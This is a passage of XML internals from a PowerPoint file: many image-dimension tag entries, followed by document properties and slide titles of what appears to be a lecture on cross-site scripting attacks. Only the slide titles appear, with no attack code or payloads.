  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag63.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="2.954545"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag64.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="3.068182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag65.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="2.954545"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag66.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="3.522727"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag67.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.170472"/>
  <p:tag name="ORIGINALWIDTH" val="3.579563"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag68.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="3.068182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag69.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="6.079563"/>
  <p:tag name="ORIGINALWIDTH" val="1.988654"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag7.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.772727"/>
  <p:tag name="ORIGINALWIDTH" val="2.840909"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag70.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.829563"/>
  <p:tag name="ORIGINALWIDTH" val="3.579563"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag71.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="3.068182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag72.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="2.954545"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag73.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.409091"/>
  <p:tag name="ORIGINALWIDTH" val="3.75"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag74.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="3.920472"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag75.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="3.068182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag76.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="3.75"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag77.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.375018"/>
  <p:tag name="ORIGINALWIDTH" val="3.181818"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag78.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="1.022727"/>
  <p:tag name="ORIGINALWIDTH" val="0.9090909"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag79.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="3.011382"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag8.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.170472"/>
  <p:tag name="ORIGINALWIDTH" val="3.579563"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag80.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="3.068182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag81.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="3.125018"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag82.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.829563"/>
  <p:tag name="ORIGINALWIDTH" val="3.693199"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag83.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.829563"/>
  <p:tag name="ORIGINALWIDTH" val="2.840909"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag84.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="3.068182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag85.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="6.079563"/>
  <p:tag name="ORIGINALWIDTH" val="1.988654"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag86.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.579563"/>
  <p:tag name="ORIGINALWIDTH" val="3.409091"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag87.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="2.272727"/>
  <p:tag name="ORIGINALWIDTH" val="0.6818182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag88.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.920472"/>
  <p:tag name="ORIGINALWIDTH" val="3.125018"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag89.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="2.272727"/>
  <p:tag name="ORIGINALWIDTH" val="0.6818182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag9.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.375018"/>
  <p:tag name="ORIGINALWIDTH" val="3.181818"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag90.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="6.079563"/>
  <p:tag name="ORIGINALWIDTH" val="1.988654"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag91.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.488654"/>
  <p:tag name="ORIGINALWIDTH" val="1.079563"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag92.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.863636"/>
  <p:tag name="ORIGINALWIDTH" val="3.068182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag93.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="6.136364"/>
  <p:tag name="ORIGINALWIDTH" val="3.011382"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag94.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="2.897745"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag95.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="3.011382"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag96.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.409091"/>
  <p:tag name="ORIGINALWIDTH" val="3.409091"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag97.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.772727"/>
  <p:tag name="ORIGINALWIDTH" val="2.840909"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag98.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.170472"/>
  <p:tag name="ORIGINALWIDTH" val="3.579563"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag99.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.375018"/>
  <p:tag name="ORIGINALWIDTH" val="3.181818"/>
  <p:tag name="EMFCHILD"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13464</TotalTime>
  <Words>1634</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>177</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Courier New</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>What is XSS?</vt:lpstr>
      <vt:lpstr>Samy Worm</vt:lpstr>
      <vt:lpstr>The XSS attack</vt:lpstr>
      <vt:lpstr>Types of XSS attacks</vt:lpstr>
      <vt:lpstr>Non-persistent (Reflected) XSS attack</vt:lpstr>
      <vt:lpstr>Reflected XSS attack (cont.)</vt:lpstr>
      <vt:lpstr>Persistent (Stored) XSS attack</vt:lpstr>
      <vt:lpstr>Stored XSS attack (cont.)</vt:lpstr>
      <vt:lpstr>Damage caused by XSS</vt:lpstr>
      <vt:lpstr>Stealing Cookies</vt:lpstr>
      <vt:lpstr>Environment setup</vt:lpstr>
      <vt:lpstr>Attack surfaces for XSS attack</vt:lpstr>
      <vt:lpstr>XSS Attack to befriend with others</vt:lpstr>
      <vt:lpstr>XSS Attack to befriend with others (cont.)</vt:lpstr>
      <vt:lpstr>XSS attack to befriend with others (cont.)</vt:lpstr>
      <vt:lpstr>Construct and add-friend request</vt:lpstr>
      <vt:lpstr>Inject the code into a profile</vt:lpstr>
      <vt:lpstr>XSS attacks to change other people’s profiles</vt:lpstr>
      <vt:lpstr>Captured HTTP request</vt:lpstr>
      <vt:lpstr>Captured HTTP request (cont.)</vt:lpstr>
      <vt:lpstr>Construct the malicious Ajax request</vt:lpstr>
      <vt:lpstr>Construct the malicious Ajax request (cont.)</vt:lpstr>
      <vt:lpstr>Inject the request into attacker’s profile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Harith Al-Sahaf</cp:lastModifiedBy>
  <cp:revision>635</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-04-12T23:12:02Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-28T20:54:44Z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